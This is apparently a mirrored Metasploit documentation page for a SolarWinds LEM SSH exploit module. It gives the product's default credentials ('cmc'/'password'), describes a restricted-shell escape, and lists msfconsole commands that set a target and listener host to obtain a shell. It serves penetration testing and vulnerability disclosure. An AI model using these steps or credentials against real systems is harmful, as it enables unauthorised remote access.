CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md
Views: 1904
Vulnerable Application
This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.
Vulnerable application can be download as a free trial from vendor webpage. http://www.solarwinds.com/log-event-manager
Verification Steps
Start msfconsole
Do:
use exploit/linux/ssh/solarwinds_lem_exec
Do:
set rhost <ip>
Do:
set lhost <ip>
Do:
exploit
You should get a shell.
Scenarios
This is a run against a known vulnerable Solarwinds LEM server.